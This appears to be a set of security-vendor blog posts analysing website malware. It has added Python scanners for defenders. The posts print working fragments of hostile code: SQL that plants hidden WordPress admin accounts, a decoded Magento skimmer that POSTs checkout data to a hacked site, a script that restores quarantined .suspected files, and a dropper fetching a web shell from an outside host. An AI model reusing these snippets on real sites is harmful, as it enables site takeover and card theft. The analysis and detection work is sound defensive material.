Search and Backdoor

The ubiquity of “unlimited” shared hosting platforms has incentivized malware to infect as many adjacent website directories as it can in order to increase its overall footprint. The larger the infected area, the more likely it is that at least one piece of malware evades detection long enough to reinfect the web hosting environment.

When a website is infected or compromised, the malicious user will often leave a backdoor that can be used to regain unauthorized access to the website or system. A backdoor doesn’t necessarily have to be a malicious file; it can also live in a database or in a running process. A database backdoor could be a shell script stored in a table row that is loaded on a certain URL. In some cases it is simply a user with full privileges that the malicious user inserted into the CMS database.

I encountered a malicious file that upon execution will go one level above the root of the infected WordPress or Joomla site:


...
define('MAX_UP_DIRS', 10);
$counter = 0;
while (chdir('..')) {
    $counter++;
    if ($counter > MAX_UP_DIRS) {
        break;
    }
    foreach (glob(getcwd() . '/*') as $file) {
        if (strpos($file, 'wp-config.php') !== false
            || strpos($file, 'wp-admin') !== false
            || strpos($file, 'configuration.php') !== false
            || strpos($file, 'administrator') !== false) {
            break 2;
        }
    }
}
chdir('..');
...

From there, it recursively searches all adjacent sites for configuration files.

...
foreach ($iter as $path => $dir) {
    if ($dir->isDir()) {
        $wp_config_file = $path . '/wp-config.php';
        $jm_config_file = $path . '/configuration.php';
        if (file_exists($wp_config_file)) {
            $wp_cfgs[] = $wp_config_file;
        }
        if (file_exists($jm_config_file)) {
            $joomla_cfgs[] = $jm_config_file;
        }
    }
}
...

Then it uses information inside the configuration files in order to connect to the database via MySQL and inject a new admin user for all adjacent sites using the following queries:

"INSERT INTO {$table_prefix}users (ID,user_login,user_pass,user_nicename,user_email,user_registered,user_status,display_name) VALUES($user_id,'$user_name',REDACTED,'$user_name','".$user_name."0985488@mailinator.com','201".rand(0,5)."-0".rand(1,9)."-1".rand(1,9)." 12:00:00',0,'$user_name')";
"INSERT INTO {$table_prefix}usermeta (user_id, meta_key, meta_value) VALUES ($user_id, '{$table_prefix}capabilities', 'a:1:{s:13:"administrator";b:1;}');";
"INSERT INTO {$table_prefix}usermeta (user_id, meta_key, meta_value) VALUES ($user_id, '{$table_prefix}user_level', 10);";

The source code also reveals plans to extend the file to target Joomla installations (i.e. the $jm_config_file variable and the configuration.php file) and insert the admin user into Joomla database structures. If the hints in the source code weren’t enough, the author even left a note of their plans:

#TO DO : JOOMLA!!!

In the end, this file shows how malicious users try to automate the creation of backdoors. While the automated creation of an admin user by malware may seem relatively simple and crude, it has proven effective enough, so it is not uncommon to encounter it on a compromised WordPress, or really any CMS (Content Management System), installation.
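As an added example (not code from the original post), a defender-side audit in Python that applies the pattern above to exported wp_users and wp_usermeta rows: it lists every administrator account that is not on an allowlist and tags the indicators these queries leave behind (the mailinator.com address and the fabricated registration timestamp). The sample rows, the allowlist and the table prefix are constructed assumptions.

```python
import re

# Constructed wp_users / wp_usermeta rows shaped like what the malware
# inserts (sample data, not taken from a real site).
USERS = [
    {"ID": 1, "user_login": "siteowner", "user_email": "owner@example.org",
     "user_registered": "2014-03-21 09:17:43"},
    {"ID": 57, "user_login": "backup", "user_email": "backup0985488@mailinator.com",
     "user_registered": "2013-04-15 12:00:00"},
    {"ID": 58, "user_login": "editor1", "user_email": "ed@example.org",
     "user_registered": "2015-06-02 10:05:00"},
]
USERMETA = [
    {"user_id": 1, "meta_key": "wp_capabilities",
     "meta_value": 'a:1:{s:13:"administrator";b:1;}'},
    {"user_id": 57, "meta_key": "wp_capabilities",
     "meta_value": 'a:1:{s:13:"administrator";b:1;}'},
    {"user_id": 57, "meta_key": "wp_user_level", "meta_value": "10"},
    {"user_id": 58, "meta_key": "wp_capabilities",
     "meta_value": 'a:1:{s:6:"editor";b:1;}'},
]

# Registration dates the malware's query generates: 201[0-5]-0[1-9]-1[1-9] 12:00:00
FAKE_REGISTERED = re.compile(r"201[0-5]-0[1-9]-1[1-9] 12:00:00")


def find_rogue_admins(users, usermeta, known_admins, table_prefix="wp_"):
    """Return {user_login: [reasons]} for administrator accounts that are not
    in the allowlist, annotated with the indicators this malware leaves."""
    caps_key = table_prefix + "capabilities"
    # Serialized PHP array WordPress stores for the administrator role
    admin_ids = {m["user_id"] for m in usermeta
                 if m["meta_key"] == caps_key
                 and 's:13:"administrator";b:1;' in m["meta_value"]}
    findings = {}
    for u in users:
        if u["ID"] not in admin_ids or u["user_login"] in known_admins:
            continue
        reasons = ["administrator not in allowlist"]
        if u["user_email"].lower().endswith("@mailinator.com"):
            reasons.append("disposable mailinator.com address")
        if FAKE_REGISTERED.fullmatch(u["user_registered"]):
            reasons.append("synthetic registration timestamp")
        findings[u["user_login"]] = reasons
    return findings
```

Every unexpected administrator is reported, so the allowlist is what does the real work; the two indicators only explain why a given account looks like this family's handiwork.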

If your sites are affected by this or similar malware, please check our guides:

Or sign up for our Website AntiVirus service and we will clean and protect your sites.

Camouflage does not have to be advanced to...

Often a malware author will try to camouflage their malware’s code in an effort to hide its true purpose from an unsuspecting eye. I recently came across an interesting example from a malicious file used to bypass authentication when accessing wp-admin:


If you aren’t familiar with the word “Softaculous”, it is a popular installer for common CMS and other scripts. If you have ever used a “one click install” tool like Fantastico de Luxe or QuickInstall/Mojo Marketplace, then it is similar to that.

I also want to mention that the filename was a random alphanumeric string, so it wasn’t possible to determine legitimacy from the filename alone. For that reason, we needed to analyze the code and make our determination from there.

An unsuspecting person may view line 4 and see that it mentions Softaculous. If they have used Softaculous before, they may just take a quick glance at the rest of the file. Since Softaculous allows for automatic updates, and users update WordPress through wp-admin, doesn’t it seem reasonable that Softaculous may need to access wp-admin for updates and that this is the purpose of this file?

This is a great example of how the camouflage attempts to trick the user into thinking this is, or might be, just a normal file. Due to this doubt, some users won’t delete the file, leaving it intact (as I am sure many of us have accidentally deleted an important file and know how destructive that can be, especially if you don’t have any backups).

Ultimately the file was not legitimate and was determined to have been maliciously added. It’s what I would call a multi-layer backdoor, as the hacker could also create their own admin user once inside wp-admin so they wouldn’t have to rely on the file being there in the future (though a professional or security-experienced user should know to examine existing users).

If you need any help or have any questions, let us know. 🙂

Database and Image Tricks in Magento Malware

Magento malware that steals customer credit card details has been a prevalent problem over the last couple of years. We write a lot about the various modifications of such malware and the tricks hackers use. Looking back, it’s interesting to see how common ideas are reused in different steps of the attack.


Database

It’s a common trick to inject malware directly into the Magento database, which helps avoid modification of files on the server. The most typical target is the design/head/includes rows of the core_config_data table. The HTML code from those records is used to build the site pages, so it’s a perfect place for injection of JavaScript code that monitors form input and sends entered data to third-party servers.

Images

Another common theme is using image files to transfer stolen data. Since 2015 (the notorious Visbot malware), we’ve seen many different variations of server-side malware that save stolen data in files with image extensions (.jpg, .png, .gif). Files with such extensions raise little suspicion since they are not executable. At the same time, they can be easily downloaded from the compromised sites. Some malware saved the data in plain text. More complex attacks appended the data to existing legitimate image files. Visbot and its "Fake SUPEE-5344 Patch" modification used public keys to encrypt the data saved in the .jpg files, which also helped make the files look like real binary images.

The "Fake SUPEE-5344 Patch" malware also had a backdoor functionality. It executed arbitrary shell commands passed in the “jpg” request parameter. Apparently, everything related to images is considered benign. Another JavaScript malware sends stolen data to a third-party server, but instead of making a direct AJAX call to that remote URL, it builds an <img> tag with that remote URL as its src parameter. The result is the same, but now it looks as if it’s loading an image from a remote server, not sending data to a remote server.

Recently, we came across a combination of all the above tricks. An obfuscated script was found in the design/footer/absolute_footer row of the core_config_data table.

<script>
this["eval"]("%:){(-7{^-&//`\n5&-8\'2,-{(\':)\'sr \n{{...skipped
...String(A).split("").reverse().join("");return H.charAt(A.indexOf(W))}));
</script>

Once decoded, it was clear that it steals data from Magento checkout pages:

if((new RegExp('onepagecheckout|onestepcheckout|onepage|firecheckout|simplecheckout')).test(window.location)) { ...

And sends it to a remote hacked site:

...
if(cc.test(snd)){ asd="1" ; } 
var http = new XMLHttpRequest(); 
http.open("POST","https://<hacked-site>/lib/paypal_icon.jpg",true); 
http.setRequestHeader("Content-type","application/x-www-form-urlencoded"); 
http.send("data="+snd+"&asd="+asd+"&id_id=infected-site.com"); 
...

The URL of the remote script looks like the URL of an image file: https://<hacked-site>/lib/paypal_icon.jpg. One might think that the script loads a PayPal icon for the checkout page. Of course, that makes little sense. And when you notice that the script uses the POST method to open that “image” and passes form data as parameters, it becomes clear that paypal_icon.jpg is not an image - it’s a server-side script that pretends to be an image (most likely either using .htaccess tricks like mod_rewrite or changing the handler and MIME type for the .jpg extension inside the /lib directory).

This malware reminds us once again that we should not trust any code, requests, or files just because they are related (or seem to be related) to images. And don’t limit your malware scans to files on the server. Most modern CMSs can’t work without a database, and databases are a common target for infections.
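As an added example (not code from the original post), a Python check that runs over exported core_config_data rows and flags the combination described above: an inline script in a design/* row, eval() of an encoded payload, and a POST to a URL that merely ends in an image extension. The rows and the host hacked-site.example are constructed placeholders.

```python
import re

# Constructed core_config_data rows (sample data, not from a real store);
# hacked-site.example stands in for the remote host.
ROWS = [
    {"path": "design/head/includes",
     "value": '<link rel="stylesheet" href="/skin/frontend/css/styles.css"/>'},
    {"path": "design/footer/absolute_footer",
     "value": '<script>this["eval"]("%:){(-7{^-&...");'
              'var http=new XMLHttpRequest();'
              'http.open("POST","https://hacked-site.example/lib/paypal_icon.jpg",true);'
              'http.send("data="+snd);</script>'},
    {"path": "design/footer/copyright", "value": "&copy; Example Store"},
]

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.S | re.I)
# eval(...) as well as the this["eval"](...) spelling used by the sample
EVAL_RE = re.compile(r"""\beval\s*\(|this\s*\[\s*["']eval["']\s*\]""")
# XMLHttpRequest.open(method, url, ...) with literal arguments
OPEN_RE = re.compile(r"""\.open\(\s*["'](\w+)["']\s*,\s*["']([^"']+)["']""")
IMAGE_URL_RE = re.compile(r"\.(jpe?g|png|gif)(\?|$)", re.I)


def scan_config_rows(rows):
    """Return {path: [indicators]} for rows whose HTML carries an inline
    script, noting eval() use and POSTs to URLs that only look like images."""
    report = {}
    for row in rows:
        scripts = SCRIPT_RE.findall(row["value"])
        if not scripts:
            continue
        indicators = ["inline <script> in design config"]
        for script in scripts:
            if EVAL_RE.search(script):
                indicators.append("eval of encoded payload")
            for method, url in OPEN_RE.findall(script):
                if method.upper() == "POST" and IMAGE_URL_RE.search(url):
                    indicators.append("POST to image-named URL " + url)
        report[row["path"]] = indicators
    return report
```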

For more information about security issues of Magento and other ecommerce platforms, please check the Ecommerce security section of our blog. If you need someone to clean and protect your site, you can count on us.

Spamming Stopped by Pastebin

We wrote multiple times about malware attacks that store their scripts on Pastebin.com and load them either onto the server once they break into it or directly into the infected web pages.

However, Pastebin.com can’t be called reliable hosting for malware. You can report any paste, and it will be removed if Pastebin.com finds it unacceptable. For example, when we find that a certain paste is being used in ongoing attacks, we report it.

What happens when a paste is removed from Pastebin.com? Of course, hackers eventually notice it, create new pastes and reconfigure the attack to use them, but for some period of time their attack is disrupted. From time to time we find signs of such disrupted attacks on infected sites. For example, recently our scanner found this file on a hacked site: skin/adminhtml/default/kontools/promailerv2.php.


Despite the .php extension, its content was pure HTML. The title of the page was "Pastebin.com - Page Removed" and the rest of the content was identical to what Pastebin.com returns when you request a removed or expired paste:

This page is no longer available. It has either expired, been removed by its creator, or removed by one of the Pastebin staff.

The code of the page contained the URL of the original paste: pastebin[.]com/HqhHiwSB. It was indeed removed. We found its original content in Google’s cache. It, as the filename implies, contained the code of a PHP script called “PRO Mailer V2” - a tool for sending out spam and phishing emails. It was uploaded on September 18, 2016 by someone in East Java, Indonesia, along with some other malicious scripts (shells, defacement, and spam tools).

If you ever come across a malicious campaign that actively uses Pastebin.com, please spend a few moments to report the pastes that it uses. You may help many people. If you ever need to publish some malicious (suspicious) code on Pastebin.com or another similar service (e.g. if you found it on your site and need advice), please make it unexecutable by adding some comments at the top, or by making other obvious changes that would prevent it from being used in attacks directly off of Pastebin.com. Also consider making such pastes private and setting them to expire after the shortest reasonable time.

If you find "Pastebin.com - Page Removed" files on your server, it’s a strong indication of a hack and you should investigate the issue. Let us know if you need professional help.

Release the Prisoners – Rename .Suspected Backdoors

When webmasters or hosting companies look for malware, they usually search for encrypted code, encoded payloads, suspicious functions and much more. If they happen to find any of those instances, it’s a common practice to either remove or rename the file in question.

If the flagged file contains a certain amount of suspicious code or raises red flags based on different variables, hosting companies may rename it from file.php to file.php.suspected (appending .suspected to the name). This way the file loses its ability to be interpreted by the web server. However, sometimes there are backdoors nearby, ready to release the prisoners.

The following code was found during an incident response investigation:

<?php
if (file_exists('wp-rmcc.php.suspected')) {
 chmod('wp-rmcc.php.suspected', 0777);
 rename('wp-rmcc.php.suspected','wp-rmcc.php');
}
@chmod("wp-rmcc.php",0444);
?>

A very short but interesting snippet: it checks whether the file wp-rmcc.php.suspected exists. If it does, the code changes its permissions to 777 and renames it to wp-rmcc.php, allowing the code to be executed again. It also does one more thing. Have you noticed this last short piece of code?

@chmod("wp-rmcc.php",0444);

It sets the file’s permissions to read-only to prevent easy removal of the malicious code. Of course, the example above is very simple and targeted at only that particular file, but the script could easily be modified to rename all files with the .suspected extension.

Most of the time, attackers will inject malware into different parts of your system to maintain access to the compromised website by having those other small infected files around, even if the obvious backdoor is renamed/blocked. That’s why simply renaming those easy to spot malicious files may not solve the case.

If you need professional help on getting the issues fixed, we’d be happy to assist you!

Web shell downloader – simple attempt to avoid...

When dealing with compromised scenarios, our team has to be very thorough to remove all pieces of malware in the infected website. Most of the time attackers don’t inject single bits of code but a variety of malware to increase the chances of maintaining access to the compromised resource while reducing the chances of getting caught.


One of the techniques they use to increase those odds is injecting a file known as a dropper, which downloads the real malware onto the system. The dropper can go undetected for a long time because it usually doesn’t contain any obfuscated functions, encoding, or anything that is malicious per se. Its sole purpose is to download and write the malware onto the system, as you can see in the snippet below:

<?php
if( $z = fopen( 'include4.php', 'w') ) {
    if( fwrite( $z, file_get_contents( 'hxxp://picasa(dot)commie.msgftw(dot)com/priv8.php') ) ) {
        fclose( $z );
        echo '0';
    } else {
        echo '1';
    }
} else {
    echo '2';
}

If you are unfamiliar with PHP, don’t worry, the snippet is pretty straightforward. The dropper tries to download the malware (web shell) using the function “file_get_contents()” and saves it into the file “include4.php”. If the operation succeeds, the number 0 is printed in the response, echoing the well-known UNIX exit code for successful command execution. If it can’t download the web shell, it prints 1; if it can’t create the file in which the shell will reside, it prints 2.
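The three file-level tells described in these notes (the "Pastebin.com - Page Removed" HTML left in a .php file, a script that renames a quarantined .suspected file back into place, and the dropper's remote fetch written to a local file) are simple enough to check for in one pass over a web root. This is an added Python example, not code from the original posts; the file contents are constructed from the snippets above and dropper.example is a placeholder host.

```python
import re

# Constructed file contents standing in for files found in a web root,
# modelled on the snippets in these notes (sample data, not real captures);
# dropper.example is a placeholder host.
FILES = {
    "skin/adminhtml/default/kontools/promailerv2.php":
        "<html><head><title>Pastebin.com - Page Removed</title></head>"
        "<body>This page is no longer available.</body></html>",
    "wp-content/uploads/loader.php":
        """<?php if (file_exists('wp-rmcc.php.suspected')) {
 chmod('wp-rmcc.php.suspected', 0777);
 rename('wp-rmcc.php.suspected','wp-rmcc.php'); } @chmod("wp-rmcc.php",0444); ?>""",
    "wp-content/themes/x/dl.php":
        "<?php if( $z = fopen( 'include4.php', 'w') ) { fwrite( $z, "
        "file_get_contents( 'http://dropper.example/priv8.php') ); fclose( $z ); }",
    "index.php": "<?php require __DIR__ . '/wp-blog-header.php';",
}


def is_pastebin_residue(path, content):
    """A .php file whose body is the Pastebin removal page rather than PHP code."""
    return (path.endswith(".php") and "<?php" not in content
            and re.search(r"<title>\s*Pastebin\.com - Page Removed", content, re.I) is not None)

def revives_suspected(path, content):
    """Code that renames a quarantined *.suspected file back into place."""
    return re.search(r"""rename\s*\(\s*['"][^'"]+\.suspected['"]""", content) is not None

def fetches_and_writes(path, content):
    """Dropper pattern: a remote fetch whose result is written to a local file."""
    return (re.search(r"""file_get_contents\s*\(\s*['"]https?://""", content) is not None
            and re.search(r"\b(fwrite|file_put_contents)\s*\(", content) is not None)

RULES = {
    "pastebin_removed_residue": is_pastebin_residue,
    "suspected_file_revival": revives_suspected,
    "remote_fetch_and_write": fetches_and_writes,
}


def scan_files(files):
    """Return {path: [rule names]} for every file that trips at least one rule."""
    hits = {}
    for path, content in files.items():
        matched = [name for name, check in RULES.items() if check(path, content)]
        if matched:
            hits[path] = matched
    return hits
```

Each hit is a reason to inspect the file and its neighbours, not a verdict on its own; legitimate update code can also fetch a URL and write a file.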

The following code is the content of the web shell fetched from the 'hxxp://picasa(dot)commie.msgftw(dot)com/priv8.php' link by the dropper:

<?php
/*
::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:: ::
:: bm.php ::
:: BoffMax v1.0 Web Shell by The-C0de Team ::
....
<? eval(gzinflate(str_rot13(base64_decode('FJ3HjuPaklJ/
...

To protect and prevent these issues from happening, we highly recommend having a File Integrity Monitoring system in place, as well as adding a Web Application Firewall to block attacks against your website. If you suspect you are infected, or detect suspicious activities on your website, feel free to contact us at: https://sucuri.net